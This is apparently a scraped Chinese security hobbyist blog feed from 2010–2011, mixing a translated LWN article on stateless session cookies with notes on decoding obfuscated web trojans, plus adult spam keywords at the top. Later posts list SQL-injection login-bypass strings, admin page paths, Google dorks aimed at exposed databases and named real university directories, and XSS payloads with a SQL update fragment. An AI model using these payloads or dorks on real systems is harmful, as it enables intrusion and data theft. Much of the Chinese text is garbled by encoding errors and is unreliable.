亚洲精品成人久久久,嫩草伊人久久精品少妇AV,思思久久99热只有频精品66

Session cookies for web applications

��默 — Sat, 08 Oct 2011 23:14:00 GMT

Session cookies for web applications [http://lwn.net/Articles/283383/]
By Jake Edge
May 21, 2008

Two weeks ago on this page, we reported on some Wordpress vulnerabilities that were caused by incorrectly generating authentication cookies. The article was a bit light on details about such cookies, so this follow-up hopes to remedy that. In addition, Steven Murdoch, who discovered both of the holes, recently presented a paper on a new cookie technique that provides some additional safeguards over other schemes.

两周前在此页上，我们报道了由不正��生成的�w�䆾验证 cookies 引�v的一�?Wordpress 漏洞。那��文档对�q�些 cookies 的细节描�q�略��，�q�篇后箋的文章希望能解决�q�个问题。另外，发现�q�些漏洞�?Steven Murdoch�Q�最�q�发表了��关于一�U�新�?cookie 技术的文章�Q�文章提供了其他�Ҏ��之`上`的一些额外保护措施�?br />
HTTP is a stateless protocol which means that any application that wishes to track multiple requests as a single session must provide its own way to link those requests. This is typically done through cookies, which are opaque blobs of data that are stored by browsers. Cookies are sent to the browser as part of an HTTP response, usually after some kind of authentication is successful. The browser associates the cookie with the URL of the site so that it can send the cookie value back to the server on each subsequent request.

HTTP 是一�U�无状态的协议�Q�这意味着��M��希望跟踪多个��h��作�ؓ单个会话的应用程序，必须提供自己的方式来链接�q�些��h��。这通常通过 cookies 来完成，cookies 是浏览器存储的不透明的数据块。通常�Q�在某种�w�䆾认证成功后，cookies 被作��Z��?HTTP 响应的一部分发送给��览器。浏览器�?cookie 和对应网站的 URL 兌��h��Q�以便它可以在每个后�l�请求中回�?cookie 值到服务器�?br />
Servers can then use the value as a key into some kind of persistent storage so that all requests that contain that cookie value are treated as belonging to a particular session. In particular, it represents that the user associated with that session has correctly authenticated. The cookie lasts until it expires or is deleted by the user. When that happens, the user must re-authenticate to get a new cookie which also starts a new session. Users find this annoying if it happens too frequently, so expirations are often quite long.

然后�Q�服务器可以`用某�U�持久性存储的键`使用该��|��使得所有包含该 cookie 值的��h��Q�被视�ؓ属于同一个特定会话。特别是�Q�它代表和该会话兌��的那个已�l�正��通过�w�䆾验证的用戗��一�?cookie 一直存在，直到�q�期或被用户删除。此�Ӟ��用户必须重新�q�行�w�䆾验证�Q�获取一个新 cookie�Q�同时开始一个新会话。如果它发生的过于频�J�，会让用户感到��g�h�Q�所以到期时间通常相当�ѝ�?br />
If the user explicitly logs out of the application, any server-side resources that are being used to store state information can be freed, but that is often not the case. Users will generally just close their browser (or tab) while still being logged in. It is also convenient for users to be allowed multiple concurrent sessions, generally from multiple computers, which will cause the number of sessions stored to be larger, perhaps much larger, than the number of users.

如果用户昑ּ�地登出应用程序，��M��用来存储状态信息的服务器端资源会被释放�Q�但情况�l�常不是�q�样。用户通常只是关闭他们的浏览器�Q�或标签��）�Q�当仍在��d��状态时。这也允许用��h��便地�Q�从不同的计��机上��用多个�ƈ发会话。这��导致存储更大的会话数量�Q�也许比用户数量大许多�?br />
Applications could restrict the number of sessions allowed by a user, or ratchet the expiration value way down, but they typically do not for user convenience. This allows for a potential denial of service when an attacker creates so many sessions that the server runs out of persistent storage. For this reason, stateless session cookies [PDF][http://prisms.cs.umass.edu/~kevinfu/papers/webauth_tr.pdf] were created.

应用�E�序可以限制允许一个用户��用的会话敎ͼ�或者``�Q�但它们通常不方便用户��用。这允许一个潜在的拒绝服务�Q�当一个攻击者创建太多会话，以至于服务器用完持久性存储时。出于这个原因，无状态会�?cookies 被创建�?br />
Stateless session cookies store all of the state information in the cookie itself, so that the server need not keep anything in the database, filesystem, or memory. The data in the cookie must be encoded in such a way that they cannot be forged, otherwise attackers could create cookies that allow them access they should not have. This is essentially where Wordpress went wrong. By not implementing stateless session cookies correctly, a valid cookie for one user could be modified into a valid cookie for a different user.

无状态会�?cookies 把所有状态信息存储到 cookie 本��n�Q��服务器不需要在数据库、文件系�l�或内存中保存�Q何信息。Cookie 中的数据必须以不能被伪造的方式�~�码�Q�否则攻击者可以创建允�总�们访问不应该讉K��内容�?cookies 。实际上�q�就�?Wordpress 出问题的地方。由于没有正��用无状态会�?cookies �Q�一个用��L��有效 cookie 可以被修�Ҏ��另一个不同用��L��有效 cookie �?br />
A stateless session cookie has the state data and expiration "in the clear" followed by a secure hash (SHA-256 for example) of those same values along with a key known only by the server. When the server receives the cookie value, it can calculate the hash and if it matches, proceed to use the state information. Because the secret is not known, an attacker cannot create their own cookies with values of their choosing.

一个无状态的会话 cookie 有状态数据和明确的到期时��_��后跟一个安全哈希��|��例如 SHA-256�Q�，该哈希值和只有服务器知道的一个键`对应`。当服务器接收到 cookie ��|��会计��哈希��|��如果匚w��Q��l��用其中的状态信息。由于这个密钥是未知的，��d��者不能��用他们选择的值创��q�� cookies �?br />
The other side of that coin is that an attacker can create spoofed cookies if they know the secret. Murdoch wanted to extend the concept such that even getting access to the secret, through a SQL injection or other web application flaw, would not feasibly allow an attacker to create a spoofed cookie. The result is hardened stateless session cookies [PDF][http://www.cl.cam.ac.uk/~sjm217/papers/protocols08cookies.pdf].

��币的另一面是�Q�如果攻击者知道密钥，可以创徏�ƺ骗性的 cookies 。Murdoch 希望扩展概念�Q��得通过 SQL 注入或其�?web 应用漏洞讉K��密钥后，��d��者也无法创徏一个欺骗性的 cookie。结果就是强化的无状态会�?cookies �?br />
The basic idea behind the scheme is to add an additional field to stateless session cookies that corresponds to an authenticator generated when an account is first set up. This authenticator is generated from the password at account creation by iteratively calculating the cryptographic hash of the password and a long salt value.

该方案背后的基本思�\是，�l�无状态会�?cookie 增加一个额外的字段�Q�这个字�D�和账户首次讄��时生成的一个`�w�䆾验证器`对应。��n份验证器由创��̎��h��的密码生成，生成�Ҏ��是，�q�代计算密码的加密哈希和一个长 salt 倹{�?br />
Salt is a random string—usually just a few characters long—that is added to a password before it gets hashed, then stored with the password in the clear. It is used to eliminate the use of rainbow tables to crack passwords. Hardened stateless session cookies use a 128-bit salt value, then repeatedly calculate HASH(prev|salt), where prev is the password the first time through and the hash value from the previous calculation on each subsequent iteration.

Salt 是一个随机字�W�串——通常只有几个字符�?#8212;—它在被计��哈希值前��d��到密码中�Q�然后以明文形式和密码一起存储。它是用来杜�l��用彩虹表破解密码的。`��化`的无状态会�?cookies 使用128�?salt ��|��然后�q�代计算 HASH(prev|salt) �Q?其中 prev 在第一�ơ�P代时是密码，在以后每�ơ�P代中是上�ơ计��的 hash 倹{�?br />
The number of iterations is large, 256 for example, but not a secret. Once that value is calculated, it is hashed one last time, without the salt, and then stored in the user table as the authenticator. When the cookie value is created after a successful authentication, only the output of the iterative hash itself is placed in the cookie, not the authenticator that is stored in the database. Cookie verification then must do the standard stateless session cookie hash verification, to ensure that the values have not been manipulated, then hash the value in the cookie to verify against authenticator in the database.

�q�代�ơ数是个大的��|��例如256�Q�但�q�不是保密的。��D��计算出来后，再不使用 salt 哈希一�ơ，然后作�ؓ�w�䆾验证器存储到用户表中。当 cookie 通过一�ơ成功认证被创徏后，只有输出的�P代哈希��D��保存�?cookie 中，而不保存数据库中的��n份验证器。Cookie 验证必须�q�行标准的无状态会�?cookie 哈希验证�Q�来��保值没有被修改�q�，然后哈希 cookie 中的值和数据库中的��n份验证器�Ҏ��?br />
If it sounds complicated, it is; the performance of doing 256 hashes is also an issue, but it does protect against the secret key being lost. Because an attacker cannot calculate a valid authenticator value to put in the cookie (doing so would require breaking SHA-256), they cannot create their own spoofed cookies.

如果�q�听��h��很复杂，��实�Q�进�?56�ơ哈希的性能也是一个问题，但它��实能避免密钥丢失。因为攻击者无法计��一个有效的用户验证器放�q?cookie 中（�q�样做需要突�?SHA-256�Q�，所以他们不能创��q��ƺ骗 cookie �?br />
While it is not clear that the overhead of all of these hash calculations is warranted, it is an interesting extension to the stateless session cookie scheme. In his paper, Murdoch mentions some variations that could be used to further increase the security of the technique.

目前��不清楚所有这些哈希计��的开销是否有必要，�q�是一个扩展无状态会�?cookie 的有��方案。在他的文章中，Murdoch 提到了一些可以进一步提高该技术安全性的变化�?br />

---
后面没看明白�?br />无状态会�?cookie 中的密钥可能被攻击者获取，authenticator ��Z��么不能被��d��者获取？获取�q�两个东西的隑ֺ�有区别么�Q?br />
---
TODO
| hash salt
| 彩虹�?/div>

��默 2011-10-09 07:14 发表评论

�|�马播报url

��默 — Fri, 20 Aug 2010 07:48:00 GMT

�|�马播报
http://log.mtian.net/
http://bbs.ikaka.com/showforum-20039.aspx
http://bbs.kafan.cn/forum-105-1.html

��默 2010-08-20 15:48 发表评论

��默 — Thu, 17 Jun 2010 05:22:00 GMT

form�Q�瑞星卡卡技术社�?br>by: networkedition
======================
==================
Document.write
解密�Ҏ��之alert�Ҏ��Q�将�|�马代码中的document.write替换为alert�?br>eg.弹出对话�?lt;script src=3.css>
   ��此代码�_�脓至freshow上操作区域，点击filter按钮�Q�数据收集区3.css木马�|�址�?br>   点击3.css�Q�进行check链接获取�|�页源代码�?br>   解密选项自然选择alpha2�Q�点击decode�q�行解密
   点击UP按钮�Q�将�W�一�ơ解密的�l�果上翻至上操作区域�q�行�W�二�ơ解密，解密选项选择esc�Q�获得网马下载地址
   点击insert按钮�Q�将解密出的�|�马地址插入数据攉��?br>   点击all按钮全选，再点击log按钮�Q�将解密出日志格式化输出�?br>
==================

Alpha2
该加密方式特征，代码开�?TYIIIIIIIIIIIIIIII
解密�Ҏ��Q�一�ơAlpha2解密�Q�一�ơesc解密

==================
shellcode
Shellcode�|�马特征�Q�以相同分隔�W�（一般�ؓ%u�Q�分隔的4位一�l�的十六�q�制字符丌Ӏ?br>解密�Ҏ��Q?br>-对于直接使用%u来分隔的shellcode�Q�通过两次esc可以直接解密出网马地址�?br>-对于通过�c�shellcode形式加密的网马，可以通过��代码进行适当处理�Q�将代码替换为分隔符%u�Q�，再进行两�ơesc解密

==================
Base64

Base64加密原理�Q?摘自��聪大牛的博�?

把每三个字符�Q�共24�?�q�制的ASCII码，折分成连�l?�?位的ASCII码，再在每个ASCII码前面补00变成8位，最后对应一个码表来变成�~�码字符�Q?br>
码表为（�?�?3分别依次对应�Q�：
0对应A………………………………………………………………………………63对应/
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
如果最后不�?位数�Q�则�?�Q�这时后面对应的�~�码�?#8220;=”
例：原文�Q?nbsp;               a                  b                c
　　ASCII码：    01100001 | 01100010 | 01100011
        分成4个：    011000 | 010110 | 001001 | 100011
        补��位数�Q?00011000 | 00010110 | 00001001 | 00100011
        数值大��：        24                22                9                  35
        对应�~�码�Q?nbsp;       Y                  W                J                  j
        �~�码�l�果�Q?nbsp;   YWJj

        如果只有ab两个字符�Q�则�W�三个字�W�用�?来代替，�q�时�l�果为YWI=
        其实按照��法�Q?对应的编码其实也可以认�ؓ是�ؓ0�Q�所以QQ==和QQAA用来解密的话�Q�都是A�Q�但是后面补0时用“=”是加密算法自��q��讄��Q�所以加密结果只能是QQ==而不会是QQAA
知道了加密原理，解密原理��反光��而行之就行了�Q�呵�?#8230;…
-----------------
加密特征�Q?br>
    大小写字母及数字��h��Q�末��֏�能包含等�?br>------------------
Base64解密�Ҏ��Q?br>
    我们�q�是以一个实例来��单讲解base64解密�Ҏ��Q�在实际的网马解密中�Q�这�U�加密方式很��见。今天我们提供一�U�解密的�Ҏ��Q�在�q�里用到的解密工具�ؓ�Q�notepad++ �q�个软�g(附�g为notepad++)。后�l�我们还会讲解��用一些其他的解密工具来解密base64�?br>

======================
US-ASCII
加密特征�Q�代码类似汉字，且代码中包含�?lt;meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" />
解密�Ҏ��Q��用freshow工具解密�Ӟ��解密选项选择US-ASCII,直接一�ơdecode卛_��

=====================
eval
解密�Ҏ��Q�malzilla->Decode->Run script

=====================
swf

Flash�|�马��介：flash�|�马是利用Adobe Flash Player播放器严重安全漏�z�， ��d��者可以通过�_�ֿ�设计的特�D�SWF文�g实施��d��。浏览这些特�D�构造的SWF文�g�Q�会�q�行��d��者设定的��L��代码�?br>
Flash�|�马解密�Ҏ��Q�今天我们主要来讲解如何利用(HTMLDecoder)工具�Q�对flash�|�马�q�行解密。此工具由小��大牛开发的一�ƾ自动网马解密工��P��内附有flash�|�马解密功能�Q�在�q�里宣传一下小��大牛哈。工具下载见附�g�Q�本�ơ讲解不提供具体的swf文�g下蝲�Q�防止一些网友不明，胡�ؕ�q�行��D��pȝ��中毒。主要讲解对于flash�|�马如何解密的方�?

功能-执行�Q�A>PDF/CWS/Zlib Extractor

======================
PDF

pdf漏洞��介：PDF是由“Adobe Acrobat”制作的，它存在一个攻��L��z�——可以在PDF文��中，利用“Adobe Acrobat”提供的Javascript脚本功能�Q�执行�Q意攻��d��令�?br>解密�Ҏ��Q�pdf�|�马和swf�|�马一��P��解密工具都是可以使用htmldecoder工具�Q�解密方法和�|�马解密高�񔽋?SWF解密)一栗��今天讲解的�q�个pdf�|�马�Q�可以直接��用freshow�q�个工具来解密，因�ؓ�q�个pdf包含的shellcode直接可以通过��C��本看到。小技巧：对于pdf或swf格式的文件我们可以通过��C��本的方式打开�Q�直接查看文件的源代码，你会有惊奇的发现�Q�尤其是�|�马解密�Q�里面说不定��有你要的网马地址呢，呵呵。本�ơ讲解同样不提供pdf文�g的下载，以免不明�|�友�Q�下载后�q�行而导致系�l�中招�?br>
.pdf源文件中复制出来的shellcode代码--带密钥的shellcode--FreShow

��默 2010-06-17 13:22 发表评论

'or'='or'�l�典漏洞��d��

��默 — Fri, 14 May 2010 23:52:00 GMT

/**
*常见模式
**/
'or'='or'
a'or'1=1--
'or 1=1--
"or 1=1--
or 1=1--
'or'a'='a
"or"a'='a
"or"a'='a
')or('a'='a

/**
*后台文�g常见文�g�?br>**/
admin
ad_login
ad_manage
addmember
adduser
adm_login
admin/admin
admin/admin_login
admin/index
admin/manage
adimin_admin
admin_edit
admin_index
admin_Login
login/...
...

/**
*关键�?br>**/
密码、用户名、后台�̎受��会员、会员ID、username、password。。�?/p>

/**
*例子
**/
intext:用户�?inurl:admin/login.asp

��默 2010-05-15 07:52 发表评论

google hack

��默 — Fri, 14 May 2010 23:50:00 GMT

/**
*语法
**/
allintext:验证�?4800
allintitle:后台登陆
cache:bit.edu.cn //现在不能用了貌似
define:html
filetype:pdf
info:bit.edu.cn
allinurl:movie //�q�个也用不了
link:nsfocus.com
site:nsfocus.com
related:nsfocus.com ///
-----
blue grass //逻辑�?br>blue -grass //�?br>blue or grass
"blue grass"
"bl?e gr?s"
blue grass +com
-----
http://www.googlesyndicatedsearch.com/u/berkeley

/**
*入��R
**/
�l�对的�\�?输入保存的�\�?输入文�g的内�?inurl:diy.asp
inurl:asp?id=
inurl:php?id= site:sohu.com
to parent directory inurl:inetpub
to parent directory mdb -google

///eg
//filetype:mdb
http://proisk.ru/Northwind.mdb

//to parent directory mdb site:edu.cn
http://netcourse.cug.edu.cn:7310/cug/fire_control/INC/_VTI_CNF/
http://netcourse.cug.edu.cn:7310

//to parent directory "conn.asp" site:edu.cn
http://www.tijmu.edu.cn/cn/dxzhx/new/admin/

//inurl:/inc+conn.asp
------

/**
*防范-----robot.txt
**/
intext:"User-agent:*" inurl:robot.txt
intext:"Mediapartners-Google" inurl:"robots.txt"
intext:"Disallow:" inurl:robots.txt
intext:"Allow:" inurl"robots.txt"

/**
*常用
**/
allinurl:bbs data
filetype:mdb inurl:database/data
filetype:inc conn
intitile:"index of" data/sh_history/bash_history/passwd

��默 2010-05-15 07:50 发表评论

【�{】跨�?例子

��默 — Fri, 14 May 2010 23:50:00 GMT

[1] >'>
[2] >">
[3]
///囄��跨站
[4] >"'>
[5] >"'>

[6] " style="background:url(javascript:alert('Watchfire XSS Test Successful'))" OA="
[7] -->
[8] '+alert('Watchfire XSS Test Successful')+'
[9] "+alert('Watchfire XSS Test Successful')+"
[10] >'><%00script>alert('Watchfire XSS Test Successful') (.NET 1.1 specific variant)
[11] >"><%00script>alert("Watchfire XSS Test Successful") (.NET 1.1 specific variant)
[12] >+ACI-+AD4-+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-
[13] %A7%A2%BE%Bc%F3%E3%F2%E9%F0%F4%Be%E1%Ec%E5%F2%F4%A8%A7Watchfire%20XSS%20Test%20Successful%A7%A9%Bc%Af%F3%E3%F2%E9%F0%F4%Be

///-------------------------------------
exec('Updata ['+@t+'] set ['+@c+'] = rtrim(convert(varchar,['+#c+']))') ???
cast(">